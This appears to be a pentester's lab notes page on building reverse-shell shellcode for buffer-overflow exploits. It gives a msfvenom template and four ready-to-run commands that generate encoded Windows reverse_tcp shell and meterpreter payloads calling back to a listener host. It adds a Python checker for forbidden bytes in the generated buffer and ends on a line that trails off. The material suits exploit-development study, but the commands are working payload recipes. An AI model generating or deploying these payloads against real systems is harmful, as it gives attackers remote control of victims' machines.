shell-for-buffer-overflow

Template (replace the placeholders; the -b list must contain every byte the target mangles, and \x00 is almost always one of them):

msfvenom -p windows/shell/reverse_tcp LHOST=<listener IP> LPORT=<listener port> -f c -a x86 --platform windows -b "\x00<other bad characters found for the target>" -e x86/shikata_ga_nai

Example of a working shell from the lab:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x09\x0a\x0d" -e x86/shikata_ga_nai

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x01\x04\x8e\xc3" -e x86/shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x01\x04\x8e\xc3" -e x86/shikata_ga_nai
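Encoders such as shikata_ga_nai can fail to honor a long -b list, so the generated buffer should be checked before it is trusted. The following Python check is an added example and is not part of the original notes: it parses the C-format string that msfvenom -f c prints, parses the bad-character list in the same "\x.." notation used above, and reports every forbidden byte with its offsets. The sample C output below is constructed for the demonstration, not real msfvenom output.

```python
import re
from typing import Iterable

# Turn the C-format literal msfvenom emits with -f c (one or more quoted
# "\x.." runs, possibly spread over several lines) back into raw bytes.
def parse_c_shellcode(c_literal: str) -> bytes:
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", c_literal))

# Parse a bad-character list written as it is passed to -b, e.g.
# "\x00\x09\x0a\x0d", into a set of byte values.
def parse_badchars(spec: str) -> set:
    return set(parse_c_shellcode(spec))

# Report every forbidden byte still present in the payload, mapped to the
# offsets where it occurs, so a failed encode is caught before use.
def find_bad_bytes(shellcode: bytes, badchars: Iterable[int]) -> dict:
    bad = set(badchars)
    hits: dict = {}
    for offset, value in enumerate(shellcode):
        if value in bad:
            hits.setdefault(value, []).append(offset)
    return hits

# Render a set of byte values back into the sorted "\x.." form used for -b.
def badchars_arg(badchars: Iterable[int]) -> str:
    return "".join(f"\\x{b:02x}" for b in sorted(set(badchars)))

# Constructed sample (not real shellcode): the encoder was asked to avoid
# \x00\x09\x0a\x0d, but two forbidden bytes slipped through.
SAMPLE_C_OUTPUT = (
    'unsigned char buf[] = \n'
    '"\\x41\\x42\\x00\\x43\\x44"\n'
    '"\\x45\\x0a\\x46\\x47";'
)
SAMPLE_BADCHARS = "\\x00\\x09\\x0a\\x0d"

# Run the check on the constructed sample; an empty dict means the encode is clean.
def check_sample() -> dict:
    return find_bad_bytes(parse_c_shellcode(SAMPLE_C_OUTPUT),
                          parse_badchars(SAMPLE_BADCHARS))

if __name__ == "__main__":
    for value, offsets in check_sample().items():
        print(f"bad byte \\x{value:02x} at offsets {offsets}")
```

An empty result means the buffer is free of the listed bytes; any hit means the encoder needs a different seed (run msfvenom again) or a different encoder.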

The following shellcode does give some kind of connection:


Last updated 3 years ago